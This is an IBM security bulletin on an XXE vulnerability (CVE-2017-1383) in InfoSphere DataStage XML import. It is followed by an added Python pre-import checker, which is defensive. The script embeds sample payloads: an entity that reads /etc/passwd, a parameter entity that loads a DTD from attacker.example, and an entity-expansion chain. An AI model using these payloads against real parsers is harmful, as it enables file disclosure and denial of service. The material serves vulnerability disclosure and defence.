Security Bulletin: IBM InfoSphere Information Server is potentially vulnerable to XML External Entity Injection (XXE)

Published 2020-06-23 22:53:34, source: www.ibm.com

EPSS: 0.002 (Low), percentile 52.9%

Summary

An XML External Entity Injection (XXE) vulnerability in IBM InfoSphere Information Server can potentially be used by an attacker to retrieve sensitive documents.

Importing from the DataStage Designer Client is a feature that enables users to migrate DataStage assets from one system to another, or from one project to another on the same system.
Examples:
• Migrating jobs from a development system to a production system
• Performing DataStage version upgrades (e.g. v11.3 to v11.5)
• Sharing assets between DataStage users and teams

IBM DataStage supports three different formats to export DataStage objects:
• DSX (DataStage eXport format)
• XML
• ISX

There is a potential vulnerability when existing DataStage assets are imported in XML format.
The DataStage Intelligent Assistants functionality creates and uses XML files and is therefore also affected.
A legacy tool, XMLImporter.exe, is also affected. This tool is no longer used and can be removed.

Likewise, there is a potential vulnerability in the XML Plugin's metadata import operations.

Vulnerability Details

CVEID: CVE-2017-1383 DESCRIPTION: IBM InfoSphere Information Server is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.
CVSS Base Score: 7.1
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/127155 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L)

Affected Products and Versions

The following products, running on all supported platforms, are affected:
IBM InfoSphere DataStage: versions 9.1, 11.3, 11.5 and 11.7
IBM InfoSphere Information Server on Cloud: version 11.5

Remediation/Fixes

For DataStage import operations:

VRMF | APAR | Remediation/First Fix
---|---|---
11.7 | JR57932 | A fix is not needed
11.5 | JR57932 | Apply DataStage Security patch
11.3 | JR57932 | Upgrade to a release where this issue is addressed.
9.1 | JR57932 | Upgrade to a release where this issue is addressed.

For other components and releases, see the Workarounds and Mitigations section.

Workarounds and Mitigations

Mitigation Steps:

DataStage import operations

Note: See Remediation/Fixes section for available fixes.

For releases other than 11.7, if a published fix is not applied:
• Limit import of DataStage assets to the DSX (default) or ISX formats only.
• If the XML format is used for import, manually check the XML file before importing it to determine whether it contains a DTD / DOCTYPE section. DTD sections are optional in DataStage XML files and, if present, can be safely removed before importing.
• Additionally, use the istool command line utility, which supports both export and import in ISX format.
Examples of the use of the istool command line utility can be found in the links below:
• https://www.ibm.com/support/knowledgecenter/en/SSZJPZ_11.5.0/com.ibm.swg.im.iis.productization.iisinfsv.migrate.doc/topics/a_exporting_projects.html
• https://www.ibm.com/support/knowledgecenter/en/SSZJPZ_11.5.0/com.ibm.swg.im.iis.iisinfsv.assetint.nav.doc/containers/istool_container_topic.html
• https://www.ibm.com/support/knowledgecenter/en/SSZJPZ_11.3.0/com.ibm.swg.im.iis.iisinfsv.assetint.doc/topics/istoolimp.html
• www.redbooks.ibm.com/redbooks/pdfs/sg247830.pdf, pp. 50-54

DataStage Intelligent Assistants

Intelligent assistant functionality is described here:
https://www.ibm.com/support/knowledgecenter/SSZJPZ_11.5.0/com.ibm.swg.im.iis.ds.design.doc/topics/c_ddesref_Intelligent_Assistants.html
The section "Creating a template from a job" explains where Templates are stored. The default location is Clients\Classic\Assistants\Generation\templates<language>.
Before using a Template, manually check the underlying XML file before importing the file to determine if there is a DTD / DOCTYPE section. DTD sections are not required in Template XML files, and if present, can be safely removed before using.

Legacy tool XMLImporter.exe

The tool XMLImporter.exe can be found in the Clients\Classic directory.
As installed it is not functional, but it could be made to work by someone with sufficient knowledge of the product internals.
It serves no useful function and should be deleted from systems.
Important: There are several similarly named executables which are not subject to this security bulletin. Please ensure to only delete the executable named XMLImporter.exe.

XML Metadata Importer operations for XML Input and XML Output plugin stages

The XML Metadata Importer is used to create table definitions from XML sources, i.e. XML Schemas and XML documents. IBM recommends manually checking the content of an XML file before importing it. If there is a DTD / DOCTYPE section, inspect it for entity declarations that reference external resources (SYSTEM or PUBLIC identifiers, including parameter entities) and for entities whose values expand into further entity references, since these are what an XXE or entity-expansion payload consists of.

DTD sections are required in some XML files; removing them could leave the imported metadata incomplete because entity data declared in the DTD would be missing.
The XML Schema Definition (XSD) language is the current standard schema language for XML documents and data, so IBM recommends using XSD as an alternative to DTD.
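The manual DTD check above is the same step in both the DataStage import / Intelligent Assistant case (the DTD is optional and can be removed) and the XML Metadata Importer case (a DTD may be required and has to be inspected). The script below automates that check for both cases. It is an added example in Python, not IBM code and not part of the original bulletin; the sample documents are constructed for the demonstration, and their element names (DSExport, Job) and the attacker.example host are assumptions rather than details of the product's file format.

```python
"""Pre-import DTD check for XML files bound for DataStage (added example, not IBM code).
Where the bulletin says the DTD is optional (job exports, Intelligent Assistant
templates) the DOCTYPE section is removed; where a DTD may be required (XML
Metadata Importer) it is inspected for external entities and expansion chains.
Element names in the samples (DSExport, Job) are assumptions.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Whole DOCTYPE declaration; the optional [...] part is the internal subset.
# XML keywords are case-sensitive, so a lower-case "<!doctype" is not matched:
# it is a well-formedness error that any conforming parser rejects anyway.
_DOCTYPE_RE = re.compile(r"<!DOCTYPE\s+(?P<head>[^\[>]*)(?:\[(?P<subset>.*?)\]\s*)?>", re.DOTALL)
# <!ENTITY name "value">, <!ENTITY name SYSTEM "uri">, <!ENTITY % name SYSTEM "uri">.
# For PUBLIC the captured literal is the public id; the URI literal follows it.
_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s%]+)\s+"
    r"(?:(?P<ext>SYSTEM|PUBLIC)\s+)?(?P<lit>\"[^\"]*\"|'[^']*')")
# Entity reference inside an entity value (char refs and predefined entities excluded).
_CHAIN_RE = re.compile(r"&(?!#|lt;|gt;|amp;|quot;|apos;)[^\s;]+;")


@dataclass
class DtdReport:
    has_doctype: bool = False
    external_dtd: bool = False  # DOCTYPE head points at a SYSTEM/PUBLIC DTD
    internal_entities: list[str] = field(default_factory=list)
    chained_entities: list[str] = field(default_factory=list)  # value references other entities
    external_entities: list[tuple[str, bool, str, str]] = field(default_factory=list)

    @property
    def risky(self) -> bool:
        """True when the DTD can pull in external resources or expand without bound."""
        return self.external_dtd or bool(self.external_entities) or bool(self.chained_entities)


def scan_doctype(xml_text: str) -> DtdReport:
    """Classify what the DOCTYPE section of xml_text declares."""
    report = DtdReport()
    m = _DOCTYPE_RE.search(xml_text)
    if m is None:
        return report
    report.has_doctype = True
    report.external_dtd = re.search(r"\b(SYSTEM|PUBLIC)\b", m.group("head")) is not None
    for e in _ENTITY_RE.finditer(m.group("subset") or ""):
        name, is_param, value = e.group("name"), e.group("param") is not None, e.group("lit")[1:-1]
        if e.group("ext"):
            report.external_entities.append((name, is_param, e.group("ext"), value))
        elif _CHAIN_RE.search(value):
            report.chained_entities.append(name)
        else:
            report.internal_entities.append(name)
    return report


def strip_doctype(xml_text: str) -> str:
    """Remove the DOCTYPE section, as the bulletin allows for DataStage export XML."""
    return _DOCTYPE_RE.sub("", xml_text, count=1)


def well_formed_without_dtd(xml_text: str) -> bool:
    """Parse with the standard library; references to now-undefined entities fail here."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


def prepare_for_import(xml_text: str, dtd_optional: bool = True) -> tuple[str, str]:
    """Return (decision, text) with decision in {"import", "stripped", "reject"}.
    dtd_optional=True models DataStage job exports and Intelligent Assistant
    templates; dtd_optional=False models the XML Metadata Importer.
    """
    report = scan_doctype(xml_text)
    if not report.has_doctype:
        return "import", xml_text
    if dtd_optional:
        cleaned = strip_doctype(xml_text)
        # A body that still references entities once the DTD is gone depended on that
        # DTD, which an ordinary export never does: treat the file as suspect.
        return ("stripped", cleaned) if well_formed_without_dtd(cleaned) else ("reject", xml_text)
    return ("reject", xml_text) if report.risky else ("import", xml_text)


# Constructed samples (not real DataStage files); attacker.example is a placeholder host.
CLEAN_EXPORT = '<?xml version="1.0"?>\n<DSExport><Job Identifier="Demo"/></DSExport>\n'
XXE_EXPORT = ('<?xml version="1.0"?>\n<!DOCTYPE DSExport [\n'
              '  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
              '  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">\n  %remote;\n]>\n'
              '<DSExport><Job Identifier="&xxe;"/></DSExport>\n')
INTERNAL_ONLY = ('<?xml version="1.0"?>\n<!DOCTYPE Order [ <!ENTITY company "Example Corp"> ]>\n'
                 '<Order><Seller>&company;</Seller></Order>\n')
EXPANSION = ('<?xml version="1.0"?>\n<!DOCTYPE lol [\n  <!ENTITY a "aaaaaaaaaa">\n'
             '  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">\n]>\n<lol>&b;</lol>\n')

if __name__ == "__main__":
    for label, doc, optional in [("clean export", CLEAN_EXPORT, True), ("XXE export", XXE_EXPORT, True),
                                 ("metadata, internal DTD", INTERNAL_ONLY, False),
                                 ("metadata, expansion DTD", EXPANSION, False)]:
        print(f"{label:24s} -> {prepare_for_import(doc, dtd_optional=optional)[0]}")
```

The "stripped" decision corresponds to the bulletin's advice for job exports and templates: the DOCTYPE is gone and the remainder still parses on its own. "reject" covers the cases the bulletin asks a reviewer to catch by eye: a DTD that declares SYSTEM/PUBLIC entities or parameter entities, an entity chain of the kind used for memory-exhaustion attacks, or an export whose body only makes sense with its DTD present. This is a triage aid for files that are about to be imported; it does not replace applying the DataStage Security patch where one is available.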

Get Notified about Future Security Bulletins

Subscribe to [My Notifications](http://www-01.ibm.com/software/support/einfo.html) to be notified of important product support alerts like this.

References

Complete CVSS v2 Guide
On-line Calculator v2

Complete CVSS v3 Guide
On-line Calculator v3


Related Information

IBM Secure Engineering Web Portal
IBM Product Security Incident Response Blog

Acknowledgement

This vulnerability was reported to IBM by Goh Zhi Hao, Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore) of SEC Consult Vulnerability Lab.

Change History

30 July 2017: Original version published
31 July 2017: republished with no changes
04 August 2017: added information for DataStage Intelligent Assistants and XMLImporter
22 December 2017: DataStage import operations in Information Server 11.7 are not vulnerable
23 June 2020: Added fix information for DataStage import operations in various releases

*The CVSS Environmental Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the References section of this Security Bulletin.

Disclaimer

Review the IBM security bulletin disclaimer and definitions regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.

Product: IBM InfoSphere Information Server (SSZJPZ); Business Unit: IBM Software w/o TPS (BU059); Platforms: AIX, HP-UX, Linux, Solaris, Windows; Versions: 9.1, 11.3, 11.5, 11.7; Line of Business: Data and AI (LOB10).
